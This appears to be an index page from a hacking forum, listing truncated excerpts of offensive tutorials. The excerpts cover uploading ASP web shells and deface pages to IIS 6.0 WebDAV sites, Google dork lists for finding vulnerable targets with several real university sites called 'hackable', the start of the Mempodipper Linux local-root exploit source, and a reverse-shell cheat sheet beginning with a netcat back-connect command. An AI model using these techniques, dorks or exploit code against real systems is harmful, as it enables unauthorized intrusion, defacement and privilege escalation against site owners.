[TuT] Exploiting Microsoft/IIS 6.0 WebDAV - Uploading Files

Today I will be teaching a way to exploit very common a vulnerability and upload your shell and/or deface page to a Microsoft IIS 6.0 based website.What you will need:A windows machine.Basic knowledge of shells.A Microsoft/IIS 6.0 website with WebDAV enabled.An ASP shell. - http://www.[removed].com/?d=YU209ET7 << Download link for the shell. (Do not even try a PHP shell, it won't work. You can use your ASP shell to upload your PHP shell after though.)This is how to perform the exploit in ...

Dorks, using dorks, finding dorks

[small tut]Dorks, using dorks, finding dorks.For educational purposes only!Usefull sites.You could also look for exclusife dorks and original exploits on:http://www.exploit-db.com/http://1337day.com/http://hackingexpose.blogspot.com/http://sekurity.tumblr.com/Dork lists on: SQLI, XSS, LFI, RFI, RTE.RANDOM very usefull dorks! http://pastebin.com/sX85tSEY <- gold worth!SQLI sQl Injectionhttp://pastebin.com/dzQRHqhuhttp://pastebin.com/0FqmasC7 <-from kobez.http://pastebin.com/x1rtqktj <-from ...

[tut] Creating google dorks

Hello, Real steel here whit another tutorial!.In this tutorial i will explain how to create your own dorks,Advanced dorks!Do you really think inurl: is the only google dork that you can use?Wrong there are many you can use!intitle:inurl:intext:define:site:phonebook:maps:book:froogle:info:movie:weather:related:link:These also help yo find other things then vulnerables.Happy googling!Anyway i was going to show how to use some for finding fulnerables.intitle:intitle:rte/file_uploud (this is an ...

Linux Local Root for => 2.6.39, 32-bit and 64-bit

# Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit# Date: Jan 21, 2012# Author: zx2c4# Tested on: Gentoo, Ubuntu# Platform: Linux# Category: Local# CVE-2012-0056 Code: /** Mempodipper* by zx2c4** Linux Local Root Exploit** Rather than put my write up here, per usual, this time I've put it* in a rather lengthy blog post: http://blog.zx2c4.com/749** Enjoy.** - zx2c4* Jan 21, 2012** CVE-2012-0056*/#define _LARGEFILE64_SOURCE#include <stdio.h>#include <string.h>#include ...

Webdav vulnerability google dork. +3,000 sites infected

Google dork:intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache"or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:eduor intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:govor intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRYJust add the /webdav extension to the URL if you found "WebDAV testpage"So go ahead it's Webdav vulnerability hackable :)Example:http://www.hebron.edu/webdav/http://www.jcjc.edu/webdav/http://archnet.asu.edu/webdav/http://mvl.mit.edu/webdav/http://www.engl.niu.edu/webdav/http://www.mstc.edu/webdav/Enjoy. ©2011, ...

Having trouble back-connecting? Here ya go!

Getting quite a few pms about back-connection recently. Heres my cheatsheet on doing it manually using what the server gives you. This is more or less a backup if a) your webshells aren't working, and b) you don't know why you can't back-connect. Hopefully you won't get stuck again.After doing recon on your target, assess what you have access to and simply cherry-pick from below. Or just try them all, why the hell not.1. netcat with GAPING_SECURITY_HOLE enabled: Code: TARGET:nc 192.168.1.133 ...